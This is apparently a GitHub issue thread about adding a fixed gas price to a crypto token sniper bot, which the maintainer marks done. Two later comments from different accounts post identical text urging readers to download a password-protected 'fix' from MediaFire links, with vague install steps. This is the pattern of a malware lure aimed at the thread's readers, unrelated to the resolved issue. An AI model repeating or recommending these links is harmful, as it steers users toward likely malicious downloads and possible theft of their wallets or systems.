### ISSUE TITLE
add fixed gwei to (more_gas_for_first_spam_tx)

### ISSUE THREAD

**Issue by goonpoor** [tsarbuig/Limit-Sniper-V3#11]
please to add fixed gwei to (more_gas_for_first_spam_tx) to prevent eth gas spike or dev sending tx with high gas to rekt sniper

**Comment by tsarbuig** [comment]
Done

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
